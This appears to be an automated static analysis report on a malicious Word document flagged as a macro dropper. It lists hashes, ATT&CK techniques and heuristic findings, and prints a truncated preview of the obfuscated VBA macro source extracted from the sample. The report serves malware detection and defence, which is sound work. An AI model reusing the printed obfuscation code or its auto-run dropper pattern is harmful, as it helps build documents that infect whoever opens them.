Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9b0b9dd4e1e9e1ba…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 88.0 KB
Created: 2017-10-16 20:18:00
Authoring application: Microsoft Office Word
First seen: 2017-10-28
MD5: fe2a18e7004c66af69f6878ba0158cdf
SHA-1: 284ea64d250f45b67b06886f42bb562392e3e0a3
SHA-256: 9b0b9dd4e1e9e1baebd83b323c18aa032a9e8914e3435c94e61e47d80d5cd938
Risk Score: 242

Malware Insights

MITRE ATT&CK
  T1059.005 Command and Scripting Interpreter: Visual Basic
  T1204.002 User Execution: Malicious File

The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening a document. The macro utilizes the Shell() function, indicating an attempt to execute an external command, likely for downloading and running a secondary payload. The ClamAV detection also points to this being a dropper.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6348953-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6348953-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    The document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA source contains a call to Shell(), i.e. the macro can launch an external command.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project contains an AutoOpen macro, which runs automatically when the document is opened (subject to the macro security setting).
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This rule catches documents whose macros exist only as p-code, or whose source extraction failed, so that no visible source is available.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels show which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12559 bytes
SHA-256: b13d7adfe08e642bcbf4a52e03913c81dbbbdbf98a832d944577b9633f7aab32

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub mWfpoVjQv()
BIJUKkDDB = "QBFC37LO3DVDM9NYEILCWSG2OFURJrCQJKWzaXhDlVNrNkktBpQovifC3N49"
icjzGpwhO = Mid(BIJUKkDDB, 25, 31)
MkQjQipcT = icjzGpwhO
OjPAUniF = "AMUCRTQSptfYicLLUtWucJaTmDwFwjDbNN8"
oAZUQ = Mid(OjPAUniF, 9, 25)
aEcuakBmPJK = oAZUQ
tBYAGZj = "9QAQlkRQIP6RN53WI8Z4"
hmNwA = Mid(tBYAGZj, 5, 4)
KcQznTiwit = hmNwA
DJkSYCZhQGn = "BLfCjSRGRniqkzbF7WT4T50GLX24J"
uWipwkUIF = Mid(DJkSYCZhQGn, 3, 13)
GQEbApE = uWipwkUIF
vNJUHoLIGXt = "THYIVRDK47WD1QNYOH1NOPOIC624FW52QWAJhwzPzwQvvjAr5Y29M"
Ohhrn = Mid(vNJUHoLIGXt, 33, 16)
ISmjIbS = Ohhrn
UrnBviYpKWJ = "HOCH8JP49RQDjQMproSoHkfAOihjVvEEwGMfPOAkDkQDKOJ6"
FiCwEu = Mid(UrnBviYpKWJ, 11, 32)
RkBaYUXz = FiCwEu
QwhJj = "YmrMOHCjodmzjTipiQZQOCWUMFZTMOE1OXE3"
FLlNQhIfLSQ = Mid(QwhJj, 2, 26)
jYjYiXf = FLlNQhIfLSQ
SmOsXKwD = "MYY7R5ODjZdnhlXzonzW0TFOU"
pKIBw = Mid(SmOsXKwD, 8, 13)
rPJicSMk = pKIBw
qlPPTcqJ = "Y81QQ994ALRBUohOGPO"
KmPDFBEC = Mid(qlPPTcqJ, 13, 3)
BHZcqLlr = KmPDFBEC
wzcrMjCJ = "PDJ7XJCNYIFSAAUXTC7I8RClLVECGnmVqojMNwphRnqojDRSSpWrBURLAIBTYM24WO"
BVGEaCzd = Mid(wzcrMjCJ, 22, 32)
opdlnqZpHE = BVGEaCzd
bOKXO = "CVALEJ0SRLSAY36XII2M8UK2EYSSO1EIE7INV"
MrXzib = Mid(bOKXO, 31, 3)
rhsUMju = MrXzib
PdtozZUOlu = "7E1OFEWYZ4I1SAczQiUShbBvtEjBIEPdRoTsdUaPUbOVffEwwYRY69"
kfHkkouipNj = Mid(PdtozZUOlu, 13, 40)
POViGGzzVD = kfHkkouipNj
zlcYiSEEb = "" + CvlkAsBw + fJCfEnNL + PlowwNPU + oVpvd + dhhCEk + fjawFQn + rTMIF + HEzXUj + dAjff + WFLGD + GFYwHzj + zBdnY + "com" + "ments" + CvlkAsBw + fJCfEnNL + PlowwNPU + oVpvd + dhhCEk + fjawFQn + rTMIF + HEzXUj + dAjff + WFLGD + GFYwHzj + zBdnY + VdiikDzS + ZOakl + lIGETSC + APUzbPb + iVzuTu
tkSsAzikjk = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 17279), 84)
GFEHQNHbJ = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 6265), 42)
olVCUHcK = Right(Left((aOtTULiNV(zlcYiSEEb)), 749), 92)
CzGVtIUuLVL = Right(Left((aOtTULiNV(zlcYiSEEb)), 15055), 61)
wZaYnCdc = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 48), 110)
HdHfvKcHaAl = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 6389), 96)
wlWEn = Mid((aOtTULiNV(zlcYiSEEb)), 17859, 59)
ZRWJWduioHZ = Right(Left((aOtTULiNV(zlcYiSEEb)), 18901), 74)
BzsmdYki = Mid((aOtTULiNV(zlcYiSEEb)), 2111, 112)
RquTcnQzpv = Mid((aOtTULiNV(zlcYiSEEb)), 14882, 73)
pHwISPtS = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 4441), 102)
QjDztkbO = Mid((aOtTULiNV(zlcYiSEEb)), 7575, 85)
LjFSbJS = Right(Left((aOtTULiNV(zlcYiSEEb)), 15873), 148)
KjZqdJkn = Right(Left((aOtTULiNV(zlcYiSEEb)), 10472), 50)
VovSq = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 598), 18)
PctfWb = Mid((aOtTULiNV(zlcYiSEEb)), 1068, 8)
MJCfhIz = Mid((aOtTULiNV(zlcYiSEEb)), 13242, 111)
IrqpZpIzGHb = Mid((aOtTULiNV(zlcYiSEEb)), 11229, 47)
NOtNupC = Mid((aOtTULiNV(zlcYiSEEb)), 14805, 76)
IaaRAiInwX = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 17941), 85)
KzjYp = Right(Left((aOtTULiNV(zlcYiSEEb)), 15382), 10)
iPUYpvvnm = Mid((aOtTULiNV(zlcYiSEEb)), 3299, 78)
HwBVjQ = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 917), 33)
paoTJD = Right(Left((aOtTULiNV(zlcYiSEEb)), 16191), 108)
DPKoECR = Mid((aOtTULiNV(zlcYiSEEb)), 2950, 141)
nCkVEuWT = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 1176), 132)
uzpQSJh = Right(Left((aOtTULiNV(zlcYiSEEb)), 3868), 27)
twKVFj = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 9362), 7)
bfKFiszv = Right(Left((aOtTULiNV(zlcYiSEEb)), 1752), 65)
mlfSzZmpP = Left(Right((aOtTULiNV(zlcYiSEEb)), Len((aOtTULiNV(zlcYiSEEb))) - 7363), 133)
riWEHQbcjfp = Mid((aOtTULiNV(zlcYiSEEb)), 13381, 42)
unZLQHrU = Right(Left((aOtTULiNV(zlcYiSEEb)), 19092), 25)
vMibwliPQ = Mid((aOtTULiNV(
... (truncated)